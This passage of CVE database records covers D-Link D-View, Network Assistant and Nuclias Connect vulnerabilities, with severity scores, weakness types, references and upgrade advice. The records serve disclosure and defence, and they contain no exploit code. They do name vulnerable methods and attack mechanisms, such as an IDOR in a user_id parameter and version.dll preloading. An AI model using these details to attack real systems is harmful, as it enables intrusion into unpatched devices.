"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-9566",
"datePublished": "2024-10-07T13:00:07.587Z",
"dateReserved": "2024-10-07T06:19:48.194Z",
"dateUpdated": "2024-10-07T13:25:20.194Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-5299 (GCVE-0-2024-5299)
Vulnerability from nvd – Published: 2024-05-23 21:30 – Updated: 2024-08-01 21:11- CWE-749 - Exposed Dangerous Method or Function
| URL | Tags |
|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-… | x_research-advisory |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:d-link:d-view:0:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "d-view",
"vendor": "d-link",
"versions": [
{
"lessThan": "2.0.3.88",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-5299",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T13:43:24.500112Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T18:02:55.399Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:11:11.554Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-450",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-450/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "D-View",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"dateAssigned": "2024-05-23T21:29:10.311Z",
"datePublic": "2024-05-14T15:21:59.534Z",
"descriptions": [
{
"lang": "en",
"value": "D-Link D-View execMonitorScript Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of D-Link D-View. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the execMonitorScript method. The issue results from an exposed dangerous method. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21828."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-749",
"description": "CWE-749: Exposed Dangerous Method or Function",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-23T21:30:14.551Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-450",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-450/"
}
],
"source": {
"lang": "en",
"value": "06fe5fd2bc53027c4a3b7e395af0b850e7b8a044"
},
"title": "D-Link D-View execMonitorScript Exposed Dangerous Method Remote Code Execution Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-5299",
"datePublished": "2024-05-23T21:30:14.551Z",
"dateReserved": "2024-05-23T21:29:10.280Z",
"dateUpdated": "2024-08-01T21:11:11.554Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-5298 (GCVE-0-2024-5298)
Vulnerability from nvd – Published: 2024-05-23 21:30 – Updated: 2024-08-01 21:11- CWE-749 - Exposed Dangerous Method or Function
| URL | Tags |
|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-… | x_research-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | D-View |
Affected:
2.0.1.28
|
|
| dlink | dir-3040_firmware |
Affected:
120b03
cpe:2.3:o:dlink:dir-3040_firmware:120b03:*:*:*:*:*:*:* |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:dlink:dir-3040_firmware:120b03:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "dir-3040_firmware",
"vendor": "dlink",
"versions": [
{
"status": "affected",
"version": "120b03"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-5298",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T14:56:07.539620Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T18:02:54.994Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:11:12.163Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-449",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-449/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "D-View",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"dateAssigned": "2024-05-23T21:29:05.253Z",
"datePublic": "2024-05-14T15:21:45.526Z",
"descriptions": [
{
"lang": "en",
"value": "D-Link D-View queryDeviceCustomMonitorResult Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of D-Link D-View. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the queryDeviceCustomMonitorResult method. The issue results from an exposed dangerous method. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21842."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-749",
"description": "CWE-749: Exposed Dangerous Method or Function",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-23T21:30:10.037Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-449",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-449/"
}
],
"source": {
"lang": "en",
"value": "06fe5fd2bc53027c4a3b7e395af0b850e7b8a044"
},
"title": "D-Link D-View queryDeviceCustomMonitorResult Exposed Dangerous Method Remote Code Execution Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-5298",
"datePublished": "2024-05-23T21:30:10.037Z",
"dateReserved": "2024-05-23T21:29:05.226Z",
"dateUpdated": "2024-08-01T21:11:12.163Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-5297 (GCVE-0-2024-5297)
Vulnerability from nvd – Published: 2024-05-23 21:30 – Updated: 2024-08-01 21:11- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
| URL | Tags |
|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-… | x_research-advisory |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:d-link:d-view:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "d-view",
"vendor": "d-link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-5297",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T20:26:50.727475Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T18:01:59.716Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:11:11.619Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-448",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-448/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "D-View",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"dateAssigned": "2024-05-23T21:28:59.359Z",
"datePublic": "2024-05-14T15:21:31.078Z",
"descriptions": [
{
"lang": "en",
"value": "D-Link D-View executeWmicCmd Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of D-Link D-View. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the executeWmicCmd method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21821."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-23T21:30:05.538Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-448",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-448/"
}
],
"source": {
"lang": "en",
"value": "06fe5fd2bc53027c4a3b7e395af0b850e7b8a044"
},
"title": "D-Link D-View executeWmicCmd Command Injection Remote Code Execution Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-5297",
"datePublished": "2024-05-23T21:30:05.538Z",
"dateReserved": "2024-05-23T21:28:59.330Z",
"dateUpdated": "2024-08-01T21:11:11.619Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-5296 (GCVE-0-2024-5296)
Vulnerability from nvd – Published: 2024-05-23 21:29 – Updated: 2024-08-01 21:11- CWE-321 - Use of Hard-coded Cryptographic Key
| URL | Tags |
|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-… | x_research-advisory |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:d-link:d-view:2.0.1.28:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "d-view",
"vendor": "d-link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-5296",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T13:11:43.781611Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T20:06:43.118Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:11:11.620Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-447",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-447/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "D-View",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"dateAssigned": "2024-05-23T21:28:51.915Z",
"datePublic": "2024-05-14T15:21:23.062Z",
"descriptions": [
{
"lang": "en",
"value": "D-Link D-View Use of Hard-coded Cryptographic Key Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of D-Link D-View. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the TokenUtils class. The issue results from a hard-coded cryptographic key. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-21991."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-321",
"description": "CWE-321: Use of Hard-coded Cryptographic Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-23T21:29:58.566Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-447",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-447/"
}
],
"source": {
"lang": "en",
"value": "Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative"
},
"title": "D-Link D-View Use of Hard-coded Cryptographic Key Authentication Bypass Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-5296",
"datePublished": "2024-05-23T21:29:58.566Z",
"dateReserved": "2024-05-23T21:28:51.883Z",
"dateUpdated": "2024-08-01T21:11:11.620Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-5292 (GCVE-0-2024-5292)
Vulnerability from nvd – Published: 2024-05-23 21:29 – Updated: 2024-08-01 21:11- CWE-427 - Uncontrolled Search Path Element
| URL | Tags |
|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-… | x_research-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Network Assistant |
Affected:
4.0.0.21
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-5292",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T17:20:09.250048Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T18:02:34.127Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:11:12.662Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-443",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-443/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "Network Assistant",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "4.0.0.21"
}
]
}
],
"dateAssigned": "2024-05-23T21:22:34.380Z",
"datePublic": "2024-05-14T15:20:54.270Z",
"descriptions": [
{
"lang": "en",
"value": "D-Link Network Assistant Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of D-Link Network Assistant. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the DNACore service. The service loads a file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-21426."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-427",
"description": "CWE-427: Uncontrolled Search Path Element",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-23T21:29:37.136Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-443",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-443/"
}
],
"source": {
"lang": "en",
"value": "Xavier DANEST"
},
"title": "D-Link Network Assistant Uncontrolled Search Path Element Local Privilege Escalation Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-5292",
"datePublished": "2024-05-23T21:29:37.136Z",
"dateReserved": "2024-05-23T21:22:34.350Z",
"dateUpdated": "2024-08-01T21:11:12.662Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2026-23754 (GCVE-0-2026-23754)
Vulnerability from cvelistv5 – Published: 2026-01-21 18:02 – Updated: 2026-05-14 02:09- CWE-639 - Authorization Bypass Through User-Controlled Key
| URL | Tags |
|---|---|
| https://supportannouncement.us.dlink.com/security… | vendor-advisorypatch |
| https://www.vulncheck.com/advisories/dlink-dview-… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23754",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T15:11:04.543748Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T16:50:54.833Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "D-View 8",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "2.0.1.107",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.0.1.107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, a security researcher at GMO Cybersecurity by IERAE, Inc."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."
}
],
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-639",
"description": "CWE-639 Authorization Bypass Through User-Controlled Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:09:23.656Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-dview-8-idor-allows-credential-disclosure-and-account-takeover"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later.\u003cbr\u003e"
}
],
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link D-View 8 IDOR Allows Credential Disclosure and Account Takeover",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-23754",
"datePublished": "2026-01-21T18:02:45.878Z",
"dateReserved": "2026-01-15T18:42:20.938Z",
"dateUpdated": "2026-05-14T02:09:23.656Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-23755 (GCVE-0-2026-23755)
Vulnerability from cvelistv5 – Published: 2026-01-21 18:02 – Updated: 2026-05-14 02:09- CWE-427 - Uncontrolled Search Path Element
| URL | Tags |
|---|---|
| https://supportannouncement.us.dlink.com/security… | vendor-advisorypatch |
| https://www.vulncheck.com/advisories/dlink-dview-… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23755",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T15:11:07.575974Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T16:50:59.815Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "D-View 8",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "2.0.1.107",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.0.1.107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, a security researcher at GMO Cybersecurity by IERAE, Inc."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise."
}
],
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-427",
"description": "CWE-427 Uncontrolled Search Path Element",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:09:24.354Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-dview-8-installer-dll-preloading-via-uncontrolled-search-path"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later.\u003cbr\u003e"
}
],
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link D-View 8 Installer DLL Preloading via Uncontrolled Search Path",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-23755",
"datePublished": "2026-01-21T18:02:30.160Z",
"dateReserved": "2026-01-15T18:42:20.938Z",
"dateUpdated": "2026-05-14T02:09:24.354Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34253 (GCVE-0-2025-34253)
Vulnerability from cvelistv5 – Published: 2025-10-16 18:53 – Updated: 2026-05-14 02:07- CWE-79 - Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')
| URL | Tags |
|---|---|
| https://www.vulncheck.com/advisories/dlink-nuclia… | third-party-advisory |
| https://www.dlink.com/en/for-business/nuclias/nuc… | product |
| https://supportannouncement.us.dlink.com/security… | vendor-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Nuclias Connect |
Affected:
0 , < 1.3.1.4
(custom)
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34253",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T14:28:34.087394Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T14:28:40.054Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Nuclias Connect",
"vendor": "D-Link",
"versions": [
{
"lessThan": "1.3.1.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.1.4",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alex Williams from Pellera Technologies"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
